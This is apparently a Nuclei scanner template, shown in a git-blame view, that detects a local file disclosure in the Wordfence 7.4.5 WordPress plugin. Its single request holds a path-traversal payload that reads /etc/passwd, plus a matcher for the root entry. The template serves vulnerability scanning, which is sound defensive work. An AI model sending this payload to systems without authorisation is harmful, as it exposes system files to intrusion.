2021-07-12 09:45:23 +00:00
|
|
|
id: wordpress-wordfence-lfi
|
|
|
|
info:
|
|
|
|
name: Wordpress Plugin wordfence.7.4.5 - Local File Disclosure
|
|
|
|
author: 0x_Akoko
|
|
|
|
severity: high
|
2021-08-18 11:37:49 +00:00
|
|
|
reference:
|
2021-07-12 09:45:23 +00:00
|
|
|
- https://www.exploit-db.com/exploits/48061
|
|
|
|
- https://www.nmmapper.com/st/exploitdetails/48061/42367/wordpress-plugin-wordfence745-local-file-disclosure/
|
|
|
|
tags: wordpress,wp-plugin,lfi,wordfence
|
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
|
|
|
|
- type: regex
|
|
|
|
regex:
|
2022-03-22 08:01:31 +00:00
|
|
|
- "root:.*:0:0:"
|
2021-07-12 09:45:23 +00:00
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|